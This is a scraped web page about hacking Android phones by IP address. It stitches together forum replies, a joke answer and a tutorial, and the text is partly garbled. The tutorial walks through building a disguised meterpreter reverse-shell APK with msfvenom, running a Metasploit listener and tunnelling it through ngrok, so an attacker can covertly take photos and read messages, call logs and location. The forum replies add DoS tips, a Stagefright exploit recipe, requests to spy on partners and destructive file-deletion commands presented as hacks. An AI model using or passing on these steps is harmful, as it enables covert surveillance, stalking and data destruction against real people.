• September 16, 2024

Hack Ip Address Android

How to Hack an Android Device with Only a Ip Adress - Null Byte

How to Hack an Android Device with Only a Ip Adress – Null Byte

i have a android phone and im wondering if i could get remote access to it with just the ip of the device and being able to look to whatsapp etc. i would like to preform actions like in a metasploit session but just without an file that needs to be installed on the device
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50 Responses
Well, a DoS attack is the simplest and one of my favorite attacks. Use something like hping3 to ping the device until it crashes! If you are using Windows, prepare a DDoS attack by getting a large group of people to ping ip address -t -l 65500 or just use LOIC.
but how do i continue to get control of the device and get like whatsapp chats or call history etc
Can you help me install keylogger in my girlfriend’s phone remotely?? Please reply
what can we do if the device is crashed..?
can u tell me what is a dos attack and how i can do it it will be very kind of u.
how do i continue to get control of the device and get like whatsapp chats or call history etc
i nee dyour advice and how i control android mobile with ip adress are same wife how can i hack
You should take HelpDesks advice and create and install a payload. the ip alone wont do much for ya, a payload is pretty you dont have access to the device and no other way of sending the payload to the target. Knowing the ip address, i suppose you could perform a MITM attack to get your payload to the target. But that doesnt mean theyll install owing the ip address is good for a lot of things, tho controlling a device remotely isnt really one of your just wanting to have remote access to one of your devices or one that you have access to and dont want to install a payload. Use SSH or something like VNC, TeamViewer ect. With these you just put them on both devices and connect using the ip and usually a password or keys.
Would u send me a video to understand this method without creating any help desk. I am having only the IP address of the smart works on MIUI 8. 1
Step 1: android smartphone Ip address security camera setupWhat is the simplest way to use a smartphone camera as a security camera, using the ip address?
hi I want to know. I would like to spy call logs, watsapp messages and smses, but the target phone is no where near me we live in different towns and I can not get the phone. is there a way I can do it without needing the target phone or a way I can install it on target phone remotely?
How to hack a device via ip
i too wanna know how to hack a phone by its ip
I was wondering that can I hack a phone if I know IP address as well as mobile number.
Its easy, Simply go to cmd and type “cd C:\ && del *. * ” then hit yes, you’ll see it load some code then ask for your IP, input the IP and you’ll have a shell on the Hacking:)
What exactly does this do?
u are not good on this u need to write this cd ~ && del. -f /n cd ~ && rm * -rf
my pc is showing that access is denied solve this problem
can u run this code on termux on android phone with ip of another android
Im typing that in command prompt but it doesn’t load code. Please help
i did this and it had no code just “C:/>” and thats it
never mind everyone ask the same thing so I guess im just another boring question that believes there is an answer
You guys are total idiots, did you really think that command will help you in anything? It deletes all files under your C drive, you couldn’t even notice that it has del Lol
Funny… well I have a question for you my good sir. I’m in prison and would like to hack into my jp5 tablet, I have the ip, and the MAC and an iPhone can it be done. I just want to be able to put movies and music on it. Thanks
What kind of weird prison that provides internet access is that? Not even Norway’s prisons have that luxury.
True dude same in Sweden.. watf you go to have a smugglade phone if thats the case
Bro I need help if you can track a IP address in tiktok I’m gonna pay $200
don’t do this it will del every file start with.
You forgot one thing, he need’s to run cmd as admin to get full access:)
You can use stagefright exploit in metasploit, this will generate a payload in a form of a website so when the victim views the website a session will be opened for an msfconsolesearch stagefrightuse the first exploit (it should be the only one there)optionsset your svrhostset your svrportrun the exploitlet the victim open the url given (it may be something like 192. 168. 1. 1/yt4byddh)then you should get a session on your console
Its very easy, Simply go to cmd and type “cd C:\ && del. ” then click yes, you’ll see it load some code then ask for your IP, input the IP and you’ll have a shell on the phone.
Plz help.. I want to know my whats going on my other phone.. Whatsap, contact, call log everything.. Plz help
For that you have to make a payload in metasploit framework and then send it to other phone via port forwarding and then start listner and you will have the remote control to the other phone…
does this ever works? I think I’ll try it on my android device
I need help, someone keeps on messaging me on fb, even harassing and threatning me. I need to access her phone to delete some picture. This is stressing me. I only have her phone IP Address.
Can we hack a phone with ip address
What’s the code if I’m on termux terminal for android trying to input ip of another android
Termux is based of linux, so you’re gonna have to do sudo rm -rf /. to get it to work. Again, it’ll prompt you for your password (it needs to generate shellcode in-memory, which requires permission) and then the IP of the android device you wanna hack
Bro if you can track up address in tiktok I’m gonna pay $200
Anyone know how to hack a jp5???
I don’t know how to hack any app but i would like to share the brand new ghd sports app to watch ipl live and other devices for free.
I am looking for how to hack snapchat online.
contact cyberhunters2 for your professional hacking service. You can reach him via gmail
How to hack android phones with ip or Mac Address - Reddit

How to hack android phones with ip or Mac Address – Reddit

Look OP, dont listen to the troll comments, ill give you a quick rundown of how you could possibly do it. The best way it to use Kali Lincox, this is a well known version of makOs developed by steven employments, once you install Kali you can find a tool named IpStealer, run it and make sure to write your gfs ip address (should be something like 192. 168. 0. 1), once you do that it will prompt you to type a h4xxor key, you can then type AK236J36JN436267LA (android key, make last digit I for iphones). Once you h4xxor key is approved you should see a “control device” button, once clicked it will call the victim phone and if they pick up you are in (remember to say “Im in” very dramatically for better results). if you got this far you should be in the mainframe of the phone, you can then read messages or even detrocalayte the cpu nodex, even aprosbulate the ram!! Once you are done doing your dirty business make sure to press the “jaxify the connection” to safely uninject the payload from the ip address.
Hacking Android Device [Remotely] | by Anmol Singh Yadav

Hacking Android Device [Remotely] | by Anmol Singh Yadav

Android is a mobile operating system, developed by Google. Initially, Android was created by Android Inc., a California-based company that worked with operating systems for digital cameras. Today there are more than 1. 6 billion users of Android phones are very easy to break if the victim can be Social Engineered into doing so. This article is about, hacking the Android Device over a LAN or WAN connection. “Android was built to be very, very secure” -Sundar PichaiWe will use a Linux system (Kali is preferred) to execute all operations. In kali, we will first generate a reverse_tcp payload using MSFvenom, then we will set off a listener using Metasploit, and finally, we will send the malicious payload (apk file) to the target’s device to get a reverse Fvenom is a combination of “MSFpayload” and “MSFencode”. These tools are extremely useful for generating payloads in various formats and encoding them using various encoder modules. Merging these two tools into a single tool not only standardizes the command-line options but also speed up things a bit by using a single framework instance. We will create our malicious [dot]apk payload using can perform this attack over LAN as well as WAN network. This means that the target & attacker doesn’t need to be connected to the same network. We will look into both types of attacks one by can check out my Video-tutorial on youtube here: means that the attacker should be connected to the same network with the target. Now follow these steps to proceed:Step1: Create a Malicious APK fileYou can do it by opening a Terminal in your Kali Linux Machine and then typing the following fvenom -p android/meterpreter/reverse_tcp LHOST=[your IP Address] LPORT=4444 R> [file_name] output of the above ’re free to choose the port number, I have used 4444. Here, I have used “” as the filename for our payload. This file is to be installed in our target’s Android device. But before installing this file, we have to set our listener. To do so, follow step ep2: Set-Up a ListenerOpen your terminal and load Metasploit console, by typing: msfconsole After it loads(after a few seconds), load multi-handler exploit by typing:use exploit/multi/handlerNow set up a reverse payload by typing:set payload android/meterpreter/reverse_tcpSet your LHOST, i. e. your local IP Address and Port that we used while generating the payload (4444 here). ( You can check your IP Address by typing ifconfig in a new terminal window)set LHOST set LPORT 4444Finally, type exploit to start the listening mode is onStep4: Install the Malicious file into the target’s deviceLet the victim install the app, and run it as soon as it gets installed. When the victim touches the open app option, you will get access to all the features of the android device. However, nothing will be displayed on the device screen after the app is reverse connection from the android device is help to see the various options that you can use to perform the different tasks on the victim’s device. You can access their camera and take a photo without notifying them. You can check their messages, call logs, and save them in your system as well. Also, you can view and open any application installed on their device. You can even get the current location coordinates of the can also send messages to any contact number via their can check out my Video-tutorial on youtube here: in WAN, first you need to have a Static IP/Hostname and second, you need to do Port Forwarding to allow your traffic transmission, and we all know that both are so difficult in real-time as we have limited access to ports in a, what we will do in this scenario, we will set up a secure tunnel using is a tunneling reverse proxy system that establishes tunnels from public endpoint i. an internet to a locally running network service. This can help us to create a public HTTP/HTTPS URL for a website running locally in our machine. We don’t need to do any kind of port forwarding while using Ngrok and our network service will eventually expose to the internet with the help of TCP these steps to proceed:Step1: Signup for Ngrok Account to Download, you will need to signup for the Ngrok Account, after that it will prompt you to the downloading Window of NgrokAfter signing up, you can download the Ngrok for your Linux unzip the downloaded ep2: Connect your accountRunning this command will add your auth token to the default configuration file. This will grant you access to more features and longer session times. (You have to copy and paste your own token here provided in the home screen of ngrok after logging in). /ngrok authtoken Now you’re ready to use this tool. Open your terminal move to the directory where you have extracted the Ngrock tool and type:. /ngrok tcp [port no]choose a port number on which you want to bind a connection(here, I have chosen 5555 as port number). And after hitting on enter, a screen something like this will be shown forwarding here specifies the TCP tunnel which ngrok has created. The connection has bound to the localhost at port 5555. Now we need to generate a malicious payload by using ep3: Generating PayloadYou can do it by opening a new Terminal in your Kali Linux Machine and then typing the following fvenom -p android/meterpreter/reverse_tcp LPORT=15787 R> [file_name] remember, this time it is a bit different than the attack we used to perform in the LAN. Here in place of IP address, we will have to enter the Forwarding link provided in the ngrok (). And the port number is going to be 15787. Remember that, it is important to enter the same port number provided by Ngrok in port If entering the IP Address as is not working, you can replace it by an IP address that you can get by using the “ping” a terminal and type ping and hit enter. You will get an IP address that you have to put in the place of, I have used “” as the filename for our payload. To do so, follow step ep4: Set-Up a ListenerOpen your terminal and load Metasploit console, by typing: msfconsole After it loads(after a few seconds), load multi-handler exploit by typing:use exploit/multi/handlerNow set up a reverse payload by typing:set payload android/meterpreter/reverse_tcpSet your LHOST as 0. 0. 0 and LPORT as 5555(The port number should be same as the port number that was used to bind the connection in the ngrok)set LHOST 0. 0set LPORT 5555Finally, type exploit to start the listening mode is onStep5: Install the Malicious file into the target’s deviceLet the victim install the app, and run it as soon as it gets installed. However, nothing will be displayed on the device screen after the app gets help to see the various options that you can use to perform the different tasks on the victim’s device. You can even get the current location coordinates of the can also send messages to any contact number via their is how one can exploit an Android device and can gain access over it irrespective of the type of connection between the attacker and the victim. It can be observed that hacking into an android device is very much easy when the user lacks awareness. It is thus advised not to install an application from unknown sources. These apps can be shared in the social media groups in form of click-bait to attract users without making them aware of the, you’re not advised to perform this attack for illegal purposes. This is for education purposes only and to make you aware of it.

Frequently Asked Questions about hack ip address android

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